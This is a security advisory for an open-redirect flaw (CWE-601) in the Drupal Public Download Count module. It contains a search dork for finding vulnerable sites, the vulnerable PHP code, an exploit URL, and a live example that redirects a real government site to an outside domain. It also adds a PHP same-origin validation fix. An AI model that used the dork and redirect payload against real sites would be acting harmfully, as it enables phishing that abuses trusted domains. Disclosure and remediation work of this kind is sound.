Drupal Public Download Count Module - Open Redirect

Published: 2017.06.08
Credit: Snooper
Risk: Medium
CWE: CWE-601
CVE: N/A
Local: No
Remote: Yes
Dork: inurl:/sites/all/modules/pubdlcnt/pubdlcnt.php

# Exploit Title: Drupal Public Download Count Module - Open Redirect
# Date: 8-6-2017
# Software Link: https://www.drupal.org/project/pubdlcnt
# Exploit Author: Snooper
# Contact: https://t.me/Snbig
# CWE: CWE-601
# Risk: Low
# Category: webapps
# Tested on: Kali Linux
# Vulnerable File: pubdlcnt.php
# Dork: inurl:/sites/all/modules/pubdlcnt/pubdlcnt.php
# Version: 7.x-3.1 and lower

1. Description

An open redirect occurs when an application takes a URL from a request parameter and redirects the user to it without any validation.
The vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it, because the link they click points at a trusted domain.

2. Vulnerable Code :

// pubdlcnt.php: the redirect target is taken straight from the "file" query parameter.
$url = check_url($_GET['file']);
$nid = check_url($_GET['nid']);
if (!eregi("^(f|ht)tps?:\/\/.*", $url)) { // check if this is absolute URL
  // if the URL is relative, then convert it to absolute
  $url = "http://" . $_SERVER['SERVER_NAME'] . $url;
}
// An absolute URL pointing at any host passes this check unchanged and is
// sent back as the Location header.
if (is_valid_file_url($url)) {
  $filename = basename($url);
  pubdlcnt_update_counter($url, $filename, $nid);
  header('Location: ' . $url);
  exit;
}


3. Exploit :

http://host/sites/all/modules/pubdlcnt/pubdlcnt.php?file=[ Open Redirect Vul ]

4. Example :

https://www.stats.gov.sa/sites/all/modules/pubdlcnt/pubdlcnt.php?file=http://leader.ir

5. Solution :
Update to version 8.x-1.x-dev
https://www.drupal.org/project/download_count/releases/8.x-1.x-dev
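For a site that cannot update immediately, the following is an added example of a same-origin check for the "file" parameter; it is written for this note and is not code from the pubdlcnt module or from Drupal. The function names, the $allowed_host parameter and the https scheme used when rebuilding the target are assumptions.

```php
<?php
// Added example, not code from the pubdlcnt module: a same-origin check that
// pubdlcnt.php could apply to $_GET['file'] before sending the Location
// header. Function names and the $allowed_host parameter are hypothetical.

/**
 * TRUE only when $url is a site-relative path or an http(s) URL whose host
 * is exactly $allowed_host, i.e. a redirect that stays on this site.
 */
function pubdlcnt_is_local_download_url($url, $allowed_host) {
  // Browsers treat "\" as "/", so normalise first: otherwise "/\evil.example"
  // would parse as a local path here but as a foreign host in the browser.
  $url = str_replace('\\', '/', $url);
  $parts = parse_url($url);
  if ($parts === FALSE) {
    return FALSE;   // Malformed URL.
  }
  if (isset($parts['scheme'])
      && !in_array(strtolower($parts['scheme']), array('http', 'https'), TRUE)) {
    return FALSE;   // javascript:, data:, ftp: ... are never downloads.
  }
  if (!isset($parts['host'])) {
    // No authority part ("//evil.example" would have landed in 'host').
    // Require a leading "/": the module's own "http://" . SERVER_NAME . $url
    // would otherwise glue "evil.example" onto the site's host name.
    return isset($parts['path']) && strpos($parts['path'], '/') === 0;
  }
  return strcasecmp($parts['host'], $allowed_host) === 0;
}

// Rebuilds the redirect target from trusted parts instead of echoing the
// input. $allowed_host must come from configuration, not from HTTP_HOST.
function pubdlcnt_safe_redirect_target($file_param, $allowed_host) {
  if (!pubdlcnt_is_local_download_url($file_param, $allowed_host)) {
    return NULL;    // Caller answers 400 instead of redirecting.
  }
  $parts  = parse_url(str_replace('\\', '/', $file_param));
  $path   = isset($parts['path']) ? $parts['path'] : '/';
  $target = 'https://' . $allowed_host . $path;   // scheme is an assumption
  if (isset($parts['query'])) {
    $target .= '?' . $parts['query'];
  }
  return $target;
}

// Constructed inputs: only the first one is allowed through (the others give NULL).
var_dump(pubdlcnt_safe_redirect_target('/sites/default/files/report.pdf', 'www.example.com'));
var_dump(pubdlcnt_safe_redirect_target('http://attacker.example/report.pdf', 'www.example.com'));
var_dump(pubdlcnt_safe_redirect_target('//attacker.example/report.pdf', 'www.example.com'));
```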

References:

https://www.owasp.org/index.php/Open_redirect
https://cwe.mitre.org/data/definitions/601.html


Copyright 2017, cxsecurity.com